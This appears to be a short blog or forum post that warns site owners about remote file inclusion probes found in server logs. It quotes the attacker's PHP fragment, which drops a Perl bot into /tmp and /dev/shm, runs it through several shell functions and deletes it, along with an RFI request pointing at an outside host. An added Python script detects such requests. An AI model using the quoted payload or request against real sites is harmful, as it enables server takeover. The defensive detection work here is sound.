Look for this “http://sslsystem.webpark.pl/center/base?” in your logfiles as some idiots try to run a variety of commands on targeted systems.
cf("/tmp/.temp_04128",$bot);
chdir("/tmp");
system("perl /tmp/.temp_04128");
passthru("perl /tmp/.temp_04128");
exec("perl /tmp/.temp_04128");
shell_exec("perl /tmp/.temp_04128");
@unlink("/tmp/.temp_04128");
cf("/dev/.temp_04128",$bot);
chdir("/dev");
system("perl /dev/shm/.temp_04128");
passthru("perl /dev/shm/.temp_04128");
exec("perl /dev/shm/.temp_04128");
shell_exec("perl /dev/shm/.temp_04128");
@unlink("/dev/.temp_04128");
There’s a thread here that mentions it, but I’m not sure it’s the same thing. The tech support folks don’t exactly show a lot of enthusiasm for finding out what’s happening. I mean, no one should be passing shell commands for things that live in /tmp.
And more:
GET /wordpress/index.php//index.php?template=http://usuarios.arnet.com.ar/larry123/safe.txt?
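
An added example, not part of the original post: one way to look for requests like these in an access log is to flag any query parameter whose decoded value is itself an absolute URL. The log lines, client addresses, timestamps and the `page` and `ref` parameter names below are constructed for illustration; the two remote URLs are the ones quoted above.

```python
import re
from urllib.parse import parse_qsl, unquote

# Request part of a common/combined log entry: client ... "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# A parameter value that is itself an absolute URL is the remote-include pattern.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def decode(value, rounds=2):
    """Undo extra layers of percent-encoding left after parse_qsl's first pass."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_remote_includes(lines):
    """Return (client_ip, parameter, remote_url) for each suspicious parameter."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        query = m.group("target").partition("?")[2]
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = decode(value)
            if REMOTE_URL_RE.match(value):
                hits.append((m.group("ip"), name, value))
    return hits

# Constructed sample log (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2000:00:00:01 +0000] "GET /wordpress/index.php//index.php'
    '?template=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.7 - - [01/Jan/2000:00:00:02 +0000] "GET /index.php'
    '?page=http%3A%2F%2Fsslsystem.webpark.pl%2Fcenter%2Fbase%3F HTTP/1.1" 200 512 "-" "-"',
    '203.0.113.5 - - [01/Jan/2000:00:00:03 +0000] "GET /wordpress/index.php?p=12'
    ' HTTP/1.1" 200 900 "http://example.invalid/" "Mozilla/5.0"',
    '192.0.2.99 - - [01/Jan/2000:00:00:04 +0000] "GET /index.php'
    '?ref=http%253A%252F%252Fexample.invalid%252Fx.txt HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for ip, param, url in find_remote_includes(SAMPLE_LOG):
        print(f"{ip} tried to include {url!r} via parameter {param!r}")
```

Legitimate redirect or callback parameters can also carry absolute URLs, so treat the hits as a triage list to review rather than a verdict.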